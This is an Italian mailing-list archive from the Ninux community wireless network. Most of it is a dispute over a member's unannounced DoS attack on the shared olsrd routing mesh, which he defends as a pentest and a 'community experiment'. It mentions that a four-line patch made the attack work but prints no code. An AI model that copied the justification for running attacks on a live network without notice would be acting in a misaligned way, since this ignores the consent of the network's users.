tuo discorso.
Il 25/mag/2014 15:52 "lilo"  ha scritto:

> Il 25/05/2014 15:33, hackerredenti ha scritto:
> > Ma io non ho nulla contro Saverio! Nemmeno mi pare di aver mai messo in
> dubbio le sue competenze o le buoni intenzioni! Ho solo detto che queste
> cose IMHO vanno organizzate.
> > Sai benissimo cosa penso della sicurezza in generale e ancor di più sai
> del discorso dns di qualche tempo fa. Tutto sacrosanto e per favore non
> fraintendetemi: nessuno attacco personale, solo sul metodo.
> > CY
> > Netsoul
>
> nessun fraintendimento, sei stato chiarissimo.
>
> per questo dicevo, andiamo al Sans giovedi, PARLIAMONE intanto.
> si potrebbe fare ad esempio una prima serata di "introduzione",
> informativa, implicazioni, etica, insomma... tutto questo chaos+ puo'
> tranquillamente confluire in un ambito che a ninux farebbe un gran bene.
>
> la rete sta crescendo, prima-repubblica o no, Saverio e' parte del CORE
> di ninux dagli albori, so quanto ci tiene alla community e so che se ha
> fatto cose NON erano per "far del male".
>
> disambiguiamo il chaos con un tot di datalove. la community va difesa.
> oltre che "costruita, vissuta, giocata".
>
> il pentesting e' un argomento nuovissimo in questo ambito. e pochi ci
> "capiscono".
>
> l'ha fatto "male"? nessuno nasce imparato. poi del discorso "community"
> leggo ora, e non ne conosco i termini.
>
> pero' ANCHE questo e' un BENE: se ci sono dissapori e' bene dirseli,
> altrimenti covano e poi diventano irrecuperabili.
>
> isola pentesting-ninux, corsi base e tools. al Sans.
>
> vi va?
>
>
> --
> lilo
> http://wiki.debian.org/LILO
> 
> -Da grande faro' il cattivo esempio, questo e' uno stage formativo-
> bit in rebels
> GnuPG/PGP Key-Id: 0x10318C92
> FINGERPRINT: 47BE F025 DD21 949F 681E 1D2B 1C2C DA80 1031 8C92
> server: pgp.mit.edu
>
>
> ___
> Wireless mailing list
> Wireless@ml.ninux.org
> http://ml.ninux.org/mailman/listinfo/wireless
>
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] R: Re: [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione lilo
Il 25/05/2014 15:33, hackerredenti ha scritto:
> Ma io non ho nulla contro Saverio! Nemmeno mi pare di aver mai messo in 
> dubbio le sue competenze o le buoni intenzioni! Ho solo detto che queste cose 
> IMHO vanno organizzate. 
> Sai benissimo cosa penso della sicurezza in generale e ancor di più sai del 
> discorso dns di qualche tempo fa. Tutto sacrosanto e per favore non 
> fraintendetemi: nessuno attacco personale, solo sul metodo. 
> CY
> Netsoul

nessun fraintendimento, sei stato chiarissimo.

per questo dicevo, andiamo al Sans giovedi, PARLIAMONE intanto.
si potrebbe fare ad esempio una prima serata di "introduzione",
informativa, implicazioni, etica, insomma... tutto questo chaos+ puo'
tranquillamente confluire in un ambito che a ninux farebbe un gran bene.

la rete sta crescendo, prima-repubblica o no, Saverio e' parte del CORE
di ninux dagli albori, so quanto ci tiene alla community e so che se ha
fatto cose NON erano per "far del male".

disambiguiamo il chaos con un tot di datalove. la community va difesa.
oltre che "costruita, vissuta, giocata".

il pentesting e' un argomento nuovissimo in questo ambito. e pochi ci
"capiscono".

l'ha fatto "male"? nessuno nasce imparato. poi del discorso "community"
leggo ora, e non ne conosco i termini.

pero' ANCHE questo e' un BENE: se ci sono dissapori e' bene dirseli,
altrimenti covano e poi diventano irrecuperabili.

isola pentesting-ninux, corsi base e tools. al Sans.

vi va?


-- 
lilo
http://wiki.debian.org/LILO

-Da grande faro' il cattivo esempio, questo e' uno stage formativo-
bit in rebels
GnuPG/PGP Key-Id: 0x10318C92
FINGERPRINT: 47BE F025 DD21 949F 681E 1D2B 1C2C DA80 1031 8C92
server: pgp.mit.edu


___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione Edoardo Mazzaracchio
Non capisco o magari mi stai prendendo in giro, stai dicendo che il metodo
usato per arrivare al fine è stato il migliore? Che una cosa che si poteva
benissimo fare in altra maniera è stata fatta meglio così?

Aiutami a capire. Io giovedì sarò al FusoLab.
Il 25/mag/2014 15:34 "lilo"  ha scritto:

> Il 25/05/2014 14:10, Edoardo Mazzaracchio ha scritto:
> > Ok, quindi a rigor di logica se voglio verificare la fragilità delle ossa
> > di qualcuno gliele rompo e poi gli dico "hey, visto? Sei vulnerabile!
>
> perdonami, il thread e' PENTESTING, non il SanCamillo.
>
> che pure ci vorrebbe, magari in ninux-salute ...
>
> di logica, in quello che scrivi, ci vedo 0.
>
> non voglio nemmeno immaginare un VERO attacco cosa avrebbe provocato.. TE?
>
> ;)
>
>
> --
> lilo
> http://wiki.debian.org/LILO
> 
> -Da grande faro' il cattivo esempio, questo e' uno stage formativo-
> bit in rebels
> GnuPG/PGP Key-Id: 0x10318C92
> FINGERPRINT: 47BE F025 DD21 949F 681E 1D2B 1C2C DA80 1031 8C92
> server: pgp.mit.edu
>
>
>
> ___
> Wireless mailing list
> Wireless@ml.ninux.org
> http://ml.ninux.org/mailman/listinfo/wireless
>
>
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] Pitagora s'è fatto Ninux: nuova isola a Crotone + richiesta 10.90.0.0/16

2014-05-25 Per discussione Alessio

Stefano De Carlo  writes:

> [Eccezionalmente in cross posting, l'occasione lo richiede]
>
> Ciao a tutti,
>
> oggi ho messo up il primo link crotonese, tra
> http://map.ninux.org/select/stefanaussdeca/ e
> http://map.ninux.org/select/stefanaussGPs :)
>
> Nonostante la situazione di PPLoS (Pelo Pelo Line of Sight), l'antenna
> per fortuna aveva un'opinione molto diversa!
>
> http://i.imgur.com/Gc5vGzJ.png
>

Maledette antenne! Fanno sempre quello che vogliono loro :D

Vai isola di Crotone!

Vai con il PPLoS che assieme al CLoS (Carambola Line of Sight) rendono
divertenti ed inaspettate le nostre escursioni sui tetti.


"don't do this at home": per chi si sta chiedendo cosa sia il CLoS, è 
una strana situazione che si verifica quando ottieni un link megliore
puntando nella stessa direzione in cui punta l AP anzichè puntando in
direzione dell'AP!
Ovviamente entrambi i link fanno pena e sono praticamente
inutillizzabili, però quando fai lo scan e vedi un nodo ninux che non
ti apsettavi ti viene sempre un sorriso. 


> [...]


nolith

-- 
Sent with my mu4e

___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


[Ninux-Wireless] R: Re: [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione hackerredenti
Ma io non ho nulla contro Saverio! Nemmeno mi pare di aver mai messo in dubbio 
le sue competenze o le buoni intenzioni! Ho solo detto che queste cose IMHO 
vanno organizzate. 
Sai benissimo cosa penso della sicurezza in generale e ancor di più sai del 
discorso dns di qualche tempo fa. Tutto sacrosanto e per favore non 
fraintendetemi: nessuno attacco personale, solo sul metodo. 
CY
Netsoul

--
ma quali "tempi"? stavo per dirti di andare al Sans giovedi prox.

gruppetto pentester.

Saverio e' una persona brillante e molto curiosa.
come tutti immagino qui dentro, ognuno per lo skill che gli compete.
(a qualcuno piace il FORUM, a qualcuno piace freddo :P)

quindi inviterei a NON scatenare odio per eventuali "disservizi".

KEEP KALM ... mica ce lo vedo Saverio a fare il Kattivone c/ninux, eh
daje.

e' vero, poteva avvisare, ma e' anche vero che sta invitando a
_studiare_ _insieme_  questa parte di informatica che ninux dovrebbe,
imho,  tenere in considerazione.

temo di aver scatenato io questa curiosita' tempo fa, mandando una
segnalazione per la quale LUI e' intervenuto al volo. per TUTTI VOI.

ha bonificato DNS incasinati altrimenti molto VULNERABILI.

quindi, per l'intelligenza e la curiosita' (e l'alta coesione) che
rappresenta questa community, direi che APPARTE ER FORUM, se nascesse
un momento per *approfondire*, partendo da quello che l'ottimo N3tS0ul
ha segnalato: L'ETICA DEL PENTESTING

mica sarebbe una cosa malvagia, tutt'altro.

o preferite che un giorno arrivi un Xtestadicazzo dall'esterno a
buttare giu' la rete?

andiamo al Sans giovedi prossimo N3tS0ul? lo dici pure a B4dTrip?
aho', siamo tra AMICI, FRATELLI &&  SORELLE. remember.



baci.



- -- 
lilo
http://wiki.debian.org/LILO

- -Da grande faro' il cattivo esempio, questo e' uno stage formativo-
bit in rebels
GnuPG/PGP Key-Id: 0x10318C92
FINGERPRINT: 47BE F025 DD21 949F 681E 1D2B 1C2C DA80 1031 8C92
server: pgp.mit.edu


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.14 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQIcBAEBAgAGBQJTge9QAAoJEBws2oAQMYyS+wsP+QGQGEcRpTH4oMkaOAYC5qz9
G5To3L4xUGjxnK/eTwniRBfmfZUQURcgLVE0b6n0DZBxBgZvJCmXtT04+beIaBsS
CBc+CAcWCM9ZZdFgyeyjPeWcuqbkrXuBmK5ITAb0EGPvLigXtHSbRNspSKlq2BNQ
ZkhPdhDasqP83iutoZgmnC4NOjH+9TXi6Ga3wApIBZa7fmLRfmEYDB1jKtzw0m4f
38NZ/cWDWdK1eOUBTiGZF1bsKXi+75KQP2ohLjudVcXkKG7I2jdllKUZQmqCZpjX
XgXyITTs0y+beOLkDUnshdCirI7A4aYaSZV6y5VC53CtDCm/UdyLed8F7PDxKNwK
/ekqYZAQ6DD7AT4zZQz4gSbJKReQ62sxUw0oKEkvNhT7RezfitijxnGQcjwrF/aN
XEPqqcDKsoArnzO7P6alGndq+qN5TjEuP0GjCiiVICmdv/n9juexvtV+R636eI4E
fXC13OGAyzWivR0bymh8tLzCPHmzDj0aaF20M5GXnCNNFaoGYVzC1Yg7CIqpN3d1
nQvhp6EiMMdUwA6VeNKT+HZ3VoEs1oz9CR/Shr6lRgikFpqNLgPF7RvD7R97B4N8
a907egiOrPQaj5BnBDI+4C2uEHW1sYlU4bsrFeLanCjWYNCQYO/XPXaRy35bmYxx
lWVzqOHl4Kb3rGqJL7E/
=RIkn
-END PGP SIGNATURE-
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione lilo
Il 25/05/2014 14:10, Edoardo Mazzaracchio ha scritto:
> Ok, quindi a rigor di logica se voglio verificare la fragilità delle ossa
> di qualcuno gliele rompo e poi gli dico "hey, visto? Sei vulnerabile!

perdonami, il thread e' PENTESTING, non il SanCamillo.

che pure ci vorrebbe, magari in ninux-salute ...

di logica, in quello che scrivi, ci vedo 0.

non voglio nemmeno immaginare un VERO attacco cosa avrebbe provocato.. TE?

;)


-- 
lilo
http://wiki.debian.org/LILO

-Da grande faro' il cattivo esempio, questo e' uno stage formativo-
bit in rebels
GnuPG/PGP Key-Id: 0x10318C92
FINGERPRINT: 47BE F025 DD21 949F 681E 1D2B 1C2C DA80 1031 8C92
server: pgp.mit.edu




0x10318C92.asc
Description: application/pgp-keys
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione lilo
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Il 25/05/2014 10:13, Netsoul ha scritto:
> Una volta queste cose venivano organizzate. Certo, il gestore non
> doveva conoscere la metodologia, ma almeno l'arco temporale in cui
> si sarebbero svolti i pentest. Almeno a me così hanno insegnato.
> Farlo "al buio"  e poi vantarsi di averlo deliberatamente fatto
> vuol dire aver  mettesso in difficoltà persone che magari proprio
> in quell'arco temporale avevano bisogno della rete o più
> semplicemente stavano cercando di risolvere piccoli bug (che poi
> non capisci se è stato il tuo bug a fottere la rete o la rete che
> fotte te) Boh, forse sbaglio io eh! Ma "ai miei tempi"  se volevi
> fare una cosa fatta bene e professionale avvisavi e poi postavi
> l'eventuale dump a beneficio di tutti... Netsoul

ma quali "tempi"? stavo per dirti di andare al Sans giovedi prox.

gruppetto pentester.

Saverio e' una persona brillante e molto curiosa.
come tutti immagino qui dentro, ognuno per lo skill che gli compete.
(a qualcuno piace il FORUM, a qualcuno piace freddo :P)

quindi inviterei a NON scatenare odio per eventuali "disservizi".

KEEP KALM ... mica ce lo vedo Saverio a fare il Kattivone c/ninux, eh
daje.

e' vero, poteva avvisare, ma e' anche vero che sta invitando a
_studiare_ _insieme_  questa parte di informatica che ninux dovrebbe,
imho,  tenere in considerazione.

temo di aver scatenato io questa curiosita' tempo fa, mandando una
segnalazione per la quale LUI e' intervenuto al volo. per TUTTI VOI.

ha bonificato DNS incasinati altrimenti molto VULNERABILI.

quindi, per l'intelligenza e la curiosita' (e l'alta coesione) che
rappresenta questa community, direi che APPARTE ER FORUM, se nascesse
un momento per *approfondire*, partendo da quello che l'ottimo N3tS0ul
ha segnalato: L'ETICA DEL PENTESTING

mica sarebbe una cosa malvagia, tutt'altro.

o preferite che un giorno arrivi un Xtestadicazzo dall'esterno a
buttare giu' la rete?

andiamo al Sans giovedi prossimo N3tS0ul? lo dici pure a B4dTrip?
aho', siamo tra AMICI, FRATELLI &&  SORELLE. remember.



baci.



- -- 
lilo
http://wiki.debian.org/LILO

- -Da grande faro' il cattivo esempio, questo e' uno stage formativo-
bit in rebels
GnuPG/PGP Key-Id: 0x10318C92
FINGERPRINT: 47BE F025 DD21 949F 681E 1D2B 1C2C DA80 1031 8C92
server: pgp.mit.edu


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.14 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQIcBAEBAgAGBQJTge9QAAoJEBws2oAQMYyS+wsP+QGQGEcRpTH4oMkaOAYC5qz9
G5To3L4xUGjxnK/eTwniRBfmfZUQURcgLVE0b6n0DZBxBgZvJCmXtT04+beIaBsS
CBc+CAcWCM9ZZdFgyeyjPeWcuqbkrXuBmK5ITAb0EGPvLigXtHSbRNspSKlq2BNQ
ZkhPdhDasqP83iutoZgmnC4NOjH+9TXi6Ga3wApIBZa7fmLRfmEYDB1jKtzw0m4f
38NZ/cWDWdK1eOUBTiGZF1bsKXi+75KQP2ohLjudVcXkKG7I2jdllKUZQmqCZpjX
XgXyITTs0y+beOLkDUnshdCirI7A4aYaSZV6y5VC53CtDCm/UdyLed8F7PDxKNwK
/ekqYZAQ6DD7AT4zZQz4gSbJKReQ62sxUw0oKEkvNhT7RezfitijxnGQcjwrF/aN
XEPqqcDKsoArnzO7P6alGndq+qN5TjEuP0GjCiiVICmdv/n9juexvtV+R636eI4E
fXC13OGAyzWivR0bymh8tLzCPHmzDj0aaF20M5GXnCNNFaoGYVzC1Yg7CIqpN3d1
nQvhp6EiMMdUwA6VeNKT+HZ3VoEs1oz9CR/Shr6lRgikFpqNLgPF7RvD7R97B4N8
a907egiOrPQaj5BnBDI+4C2uEHW1sYlU4bsrFeLanCjWYNCQYO/XPXaRy35bmYxx
lWVzqOHl4Kb3rGqJL7E/
=RIkn
-END PGP SIGNATURE-
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione Alessandro Gnagni
Va be save, hai sempre ragione tu.
All'inizio sembrava un problema di configurazioni da parte di pierluigi
sulle sue macchine.
Dopo aver appurato che era tutto ok ieri sera alle 9 mi sono messo a
cercare di analizzare la cosa a fondo.
Io posso spiegare benissimo come ho fatto, solo onestamente non mi fido più
di te.
Io avrei preferito che tu agissi con maggior chiarezza, cosa che tu chiedi
sempre agli altri.
Tanto ormai solo quello che fai tu è giusto... noi sbagliamo sempre.
Ma non riesci a fare le cose comunicando con gli altri? Siamo una
community, tu invece ti sei rintanato nel tuo antro a scrivere codice per
creare bug.
Lo sappiamo tutti che volendo olsr è attaccabbile in milioni di modi, ma
per questo tuo bug hai creato un problema, senza proporrere una soluzione.
Il 25/mag/2014 13:50 "Saverio Proto"  ha scritto:

> Il 25 maggio 2014 10:13, Netsoul  ha scritto:
> >
> > Una volta queste cose venivano organizzate. Certo, il gestore non doveva
> conoscere la metodologia, ma almeno l'arco > temporale in cui si sarebbero
> svolti i pentest. Almeno a me così hanno insegnato. Farlo "al buio"  e poi
> vantarsi di
>  > averlo deliberatamente fatto vuol dire aver  mettesso in difficoltà
> persone che magari proprio in quell'arco temporale
> > avevano bisogno della rete o più semplicemente stavano cercando di
> risolvere piccoli bug (che poi non capisci se è >stato il tuo bug a fottere
> la rete o la rete che fotte te)
> > Boh, forse sbaglio io eh! Ma "ai miei tempi"  se volevi fare una cosa
> fatta bene e professionale avvisavi e poi postavi >l'eventuale dump a
> beneficio di tutti...
>
> Ciao Netsoul,
>
> il tuo nick mi è nuovo, quindi prima di tutto piacere di conoscerti.
>
> le tue osservazioni sono corrette, ma io non volevo solo fare un
> esperimento tecnico, ma un esperimento "community".
>
> Ero ti spiego perché farlo "al buio".
>
>
> Parte tecnica:
> abbiamo capito che con una patch da 4 righe si può fare un attacco DoS
> che funziona.
> abbiamo capito che se il TTL non è forgiato possiamo capire a quanti
> hop da noi è l'attaccante, e provare a identificarlo.
>
> Parte community:
> fino alla risoluzione del problema non è girata nemmeno una email su
> lista wireless o nodi-roma. C'è quindi un gruppetto che lavora per
> fatti suoi. Un gruppetto chiuso. Questo è una male per la community.
> Non vengono coinvolte tutte le persone nelle cose tecniche ma solo gli
> amichetti.
>
> solo alla soluzione del problema è stato a questo punto scritto su
> nodi-roma, ma perché? tanto valeva scrivere a me ? E' stato scritto
> perché si doveva additare "il cattivo". A quel punto tanta gente
> simpatizzante di Andrea e con poche competenza tecnica ha rincarato la
> dose attaccando "il cattivo". Si è arrivati a richiedere una punizione
> con per "il cattivo". Ci vorrebbe qualcuno con piu competenze di me in
> psicologia per analizzare in fenomeno.
>
> La parte tecnica è andata totamente in secondo piano. Non sono stati
> dati dettagli di come è stato trovato l'attaccante. Non sono state
> date risposte alle domande tecniche fatte. Io avevo lanciato degli
> inviti interessati come l'articolo sul blog ma non mi è stato dato
> alcun seguito.
>
> era proprio questo tipo di esperimento che volevo fare !
> questa community ha bisogno di una cura :)
>
> ciao,
>
> Saverio
> ___
> Wireless mailing list
> Wireless@ml.ninux.org
> http://ml.ninux.org/mailman/listinfo/wireless
>
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione NetSoul
Bentrovato anche a te,
per fortuna il mio nick ha avuto il beneficio del “diritto all’oblio” .. l’ho 
rispolverato da poco dopo anni di inattività. In verità sono passato giovedì 
scorso al Fuso, proprio per salutare tutti e per iniziare ad imparare qualcosa 
da voi.
Detto questo non discuto assolutamente sulla utilità della cosa ma solo sulla 
modalità di esecuzione.
Se posso esprimere una mia opinione personale, citandoti:

"C'è quindi un gruppetto che lavora per fatti suoi. Un gruppetto chiuso.”

Ok, sarà pure. Ma nemmeno tu in questo caso hai pensato di coinvolgere tutti 
con una mail del tipo “oh, ragazzi. Proviamo a fare un po’ di test sulla rete? 
Chi di voi vuole partecipare? Io vorrei fare delle prove il…. verso le…. “

Non entro poi nel merito delle dinamiche del gruppo perché non vi conosco così 
bene da potermi permettere di farlo, quindi la mia eccezione rimane solo sul 
campo tecnico dei test.
Ciao 
NetSoul

Premesso che non discuto sull’utilità della cosa ma solo sulla modalità. 
On 25/mag/2014, at 13:50, Saverio Proto  wrote:

>> 
> 
> Ciao Netsoul,
> 
> il tuo nick mi è nuovo, quindi prima di tutto piacere di conoscerti.
> 
> le tue osservazioni sono corrette, ma io non volevo solo fare un
> esperimento tecnico, ma un esperimento "community".
> 
> Ero ti spiego perché farlo "al buio".
> 
> 
> Parte tecnica:
> abbiamo capito che con una patch da 4 righe si può fare un attacco DoS
> che funziona.
> abbiamo capito che se il TTL non è forgiato possiamo capire a quanti
> hop da noi è l'attaccante, e provare a identificarlo.
> 
> Parte community:
> fino alla risoluzione del problema non è girata nemmeno una email su
> lista wireless o nodi-roma. C'è quindi un gruppetto che lavora per
> fatti suoi. Un gruppetto chiuso. Questo è una male per la community.
> Non vengono coinvolte tutte le persone nelle cose tecniche ma solo gli
> amichetti.



signature.asc
Description: Message signed with OpenPGP using GPGMail
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


[Ninux-Wireless] minibug Scoorreeggione v5

2014-05-25 Per discussione BornAgain
Ciao,

naturalmente molti di voi se si installano il firmware Openwrt sapranno già 
come porvi rimedio [ma altri no ..] e quindi lo dico lo stesso

Scaricando http://wiki.ninux.org/FirmwareScooreggione V5 e precisamente per la 
nanostation , quindi già compilato, credo la cosa ci sia anche sugli altri

c'è un errore nel repository e il link punta a un sito inesistente

OpenWrt Scooreggione v5 si basa su 12.09.1

quindi se fate opkg update l'aggiornamento pacchetti fallisce

per sistemare la cosa basta editare il file /etc/opkg.conf e inserire nella 
riga 1 il link corretto 

 http://downloads.openwrt.org/attitude_adjustment/12.09-rc1/ 

oppure http://downloads.openwrt.org/attitude_adjustment/12.09/

naturalmente il link prosegue con la versione di firmware e apparato che state 
scaricando


ciao



BornAgain

bornag...@autoproduzioni.net 

Nodo su wireless comunitaria Ninux.org 
http://map.ninux.org/select/reggiocalbornagain/




PGP.sig
Description: Questa è un messaggio firmato elettronicamente
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione Edoardo Mazzaracchio
Ok, quindi a rigor di logica se voglio verificare la fragilità delle ossa
di qualcuno gliele rompo e poi gli dico "hey, visto? Sei vulnerabile!
Ringraziami, ora lo sai! E dai, non prendertela per un paio di mesi di
clauticanza"

Abbiamo già detto che queste cose si possono verificare in sicuri ambienti
di test senza recar fastidi, volete fare il test nel caso reale? Fatelo in
un vostro gruppo di macchine, Ninux non è il playground di pochi ma è la
rete di tutti i partecipanti. E siccome è evidente che ci sono diverse
visioni sulla rete, ognuno dovrebbe rispettare quella altrui. Se dovessi
fare come Saverio rimetterei AirMax pure sulla bullet e taglierei fuori
Pellegri e lui, invece no, rispetto (sentendomi un coglione, a questo
punto) la loro scelta di OpenWRT e gli lascio la loro antenna dedicata, ah
a proposito abbiamo anche migliorato i link due settimane fa (doppiamente
coglione). A questo punto ditelo apertamente, dobbiamo fare ognuno come
cazzo gli pare?

Nella bellissima riunione di giovedì scorso, con tanti ninuxiani vecchi e
nuovi, si respirava un'aria di gente che ha voglia di fare, tutti a
sorridere, nessuno che faceva il cagacazzi, poi ti trovi queste situazioni
e ti passa la voglia.

Ma che vi costa a voi "penetration tester" fare i test senza rompere i
coglioni al prossimo?

E pensare che basterebbe dire "ho verificato in casa questa falla, vorrei
fare un test sul caso reale" per dare quantomeno un aspetto di serietà e
magari pure dei ringraziamenti, invece no, si preferisce provocare e
prendere gli insulti, io non lo so come ragionate.

Alla prossima decisionale se ne parlerà a lungo e vedremo che ne verrà
fuori. Spero si prenderà una linea guida ben definita per non dover più
assistere a malumori.
Il 25/mag/2014 13:32 "Alessandro (aka ArkaNet)"  ha
scritto:

> Perdona(te) il replay ma è doveroso...
>
> 1) che si approvi o meno, la farm è la meta che si prefiggerebbe chiunque
> in un 'attacco' simile
> 2) i servizi sono come il miele per api ed orsi, ergo vedi 1)
> 3) avrei scelto anche io l'indirizzo di una macchina ancora non esistente
> né sul mapserver né sul wiki
>
> Detto ciò non avere fretta di sentirti tu il diretto interessato
> dell'attacco, solo perché tu hosti la farm, è la rete che deve *imparare* a
> difendersi e come vedi abbiamo imparato anche un'altra cosa, ovvero che se
> un servizio è centralizzato è più semplice da identificare ed attaccare
>
> Quindi, sì Buona Domenica ;)
>
> *--
> Arka*
>
>
>
> Il giorno 25 maggio 2014 12:27, Andrea Pescetelli <
> andrea.pescete...@gmail.com> ha scritto:
>
>> Non è sminuendo la cosa che si risolve il problema.
>> Dove andare a colpire in un azione premeditata?
>> I servizi di tutti perchè ZioProto se ne frega della chat dove gli altri
>> fanno gsoc e scambiano opinioni.
>> Dove? Nella Farm che lui stesso non approva e guarda caso dove ci sta
>> anche casa mia dove forse per qualche motivo in un futuro avrebbe potuto
>> girarci anche il blog che gyardacaso non approva.
>> Quale subnet? La pubbica della farm e perchè non quella dove ci sta anche
>> il mail server di Nino?
>> Quale target? Una macchina guarda caso di casa al mare di Pierluigi che
>> abbiamo sostituito giovedi' insieme ad altre 3 perchè seccate da un fulmine
>> quindo oltre al culo per sistemare pura la presa per il culo a fare la
>> caccia alle streghe di un danno provocato senza avviso.
>>
>> No grazie se devo bestemmiare allora bestemmio e questo non è relax ma
>> danno provocato e torno a ripetere che un provvedimento simbolico va preso.
>> Non mi curo che sia ZioProto o qualsiasi altro ma che sia di esempio.
>>
>> Se per voi questa è ninux allora non utilizzate i servizi che non
>> approvate e fate un passo indietro.
>>
>>
>>
>>
>> Il giorno 25 maggio 2014 12:16, Alessandro (aka ArkaNet) <
>> arkant...@gmail.com> ha scritto:
>>
>> Hola!
>>>
>>> Fish hai ragione dobbiamo fare qualcosa!!
>>> Sicuramente ZioProTo ci sta facendo capire quanto sia semplice per un
>>> macellaio utilizzare un coltello.
>>> Cosa dovremmo aver acquisito alla luce di ciò?
>>> Che se arrivasse un assassino e si impadronisse del coltello, farebbe
>>> una strage!
>>>
>>> Ora, senza troppe metafore, ci siamo resi conto che se qualcuno ha
>>> voglia (e capacità) può farci male.
>>>  I provvedimenti dobbiamo prenderli per evitare minacce *esterne*, e che
>>> sicuramente non avvisino prima di agire!
>>> Dire che Saverio sia una minaccia sarebbe come entrare in chiesa e
>>> bestemmiare, insomma ... non si fa ;)
>>>
>>> Se vogliamo una rete 'pronta' e con una certa resilienza, dobbiamo
>>> costruircela. A volte non basta fare il link migliore per poter dire di
>>> avere una struttura solida.
>>> Abbiamo anche bisogno di un motore che spinga!
>>>
>>> E poi ricordiamoci che ninux fa rima con relax!
>>>
>>> Io direi "fortuna che era un'azione controllata!" (e fatta apposta per
>>> essere controllabile)
>>>
>>> Bella && Buona Domenica @tutti
>>>
>>> *--
>>> Arka*
>>>
>>>
>>>
>>> Il giorno 25 maggio 2014 09:3

Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione Saverio Proto
Il 25 maggio 2014 10:13, Netsoul  ha scritto:
>
> Una volta queste cose venivano organizzate. Certo, il gestore non doveva 
> conoscere la metodologia, ma almeno l'arco > temporale in cui si sarebbero 
> svolti i pentest. Almeno a me così hanno insegnato. Farlo "al buio"  e poi 
> vantarsi di
 > averlo deliberatamente fatto vuol dire aver  mettesso in difficoltà
persone che magari proprio in quell'arco temporale
> avevano bisogno della rete o più semplicemente stavano cercando di risolvere 
> piccoli bug (che poi non capisci se è >stato il tuo bug a fottere la rete o 
> la rete che fotte te)
> Boh, forse sbaglio io eh! Ma "ai miei tempi"  se volevi fare una cosa fatta 
> bene e professionale avvisavi e poi postavi >l'eventuale dump a beneficio di 
> tutti...

Ciao Netsoul,

il tuo nick mi è nuovo, quindi prima di tutto piacere di conoscerti.

le tue osservazioni sono corrette, ma io non volevo solo fare un
esperimento tecnico, ma un esperimento "community".

Ero ti spiego perché farlo "al buio".


Parte tecnica:
abbiamo capito che con una patch da 4 righe si può fare un attacco DoS
che funziona.
abbiamo capito che se il TTL non è forgiato possiamo capire a quanti
hop da noi è l'attaccante, e provare a identificarlo.

Parte community:
fino alla risoluzione del problema non è girata nemmeno una email su
lista wireless o nodi-roma. C'è quindi un gruppetto che lavora per
fatti suoi. Un gruppetto chiuso. Questo è una male per la community.
Non vengono coinvolte tutte le persone nelle cose tecniche ma solo gli
amichetti.

solo alla soluzione del problema è stato a questo punto scritto su
nodi-roma, ma perché? tanto valeva scrivere a me ? E' stato scritto
perché si doveva additare "il cattivo". A quel punto tanta gente
simpatizzante di Andrea e con poche competenza tecnica ha rincarato la
dose attaccando "il cattivo". Si è arrivati a richiedere una punizione
con per "il cattivo". Ci vorrebbe qualcuno con piu competenze di me in
psicologia per analizzare in fenomeno.

La parte tecnica è andata totamente in secondo piano. Non sono stati
dati dettagli di come è stato trovato l'attaccante. Non sono state
date risposte alle domande tecniche fatte. Io avevo lanciato degli
inviti interessati come l'articolo sul blog ma non mi è stato dato
alcun seguito.

era proprio questo tipo di esperimento che volevo fare !
questa community ha bisogno di una cura :)

ciao,

Saverio
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

2014-05-25 Per discussione Andrea Pescetelli
Stai sbagliando perche' la macchina 172.16.40.40 esisteva
Per cessare l'attacco e' stata passata a 172.16.40.43 avvisando i
propietari preventivamente.
Quindi essendo male informato anche le tue conclusioni restano affrettate.

Penso di aver concluso.
Il 25/mag/2014 13:32 "Alessandro (aka ArkaNet)"  ha
scritto:

> Perdona(te) il replay ma è doveroso...
>
> 1) che si approvi o meno, la farm è la meta che si prefiggerebbe chiunque
> in un 'attacco' simile
> 2) i servizi sono come il miele per api ed orsi, ergo vedi 1)
> 3) avrei scelto anche io l'indirizzo di una macchina ancora non esistente
> né sul mapserver né sul wiki
>
